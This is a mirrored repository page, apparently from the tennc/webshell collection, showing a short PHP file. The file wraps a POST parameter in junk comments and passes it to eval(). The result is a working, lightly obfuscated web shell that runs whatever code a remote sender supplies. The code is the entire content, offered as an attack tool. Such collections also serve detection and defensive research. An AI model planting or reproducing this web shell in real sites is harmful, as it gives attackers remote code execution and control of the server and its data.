mirror of
https://github.com/tennc/webshell
synced 2024-11-22 19:23:05 +00:00
12 lines
97 B
PHP
12 lines
97 B
PHP
|
<?php
|
||
|
|
||
|
function x()
|
||
|
{
|
||
|
|
||
|
return "/*sasas23123*/".$_POST['a']."/*sdfw3123*/";
|
||
|
|
||
|
}
|
||
|
|
||
|
eval(x());
|
||
|
?>
|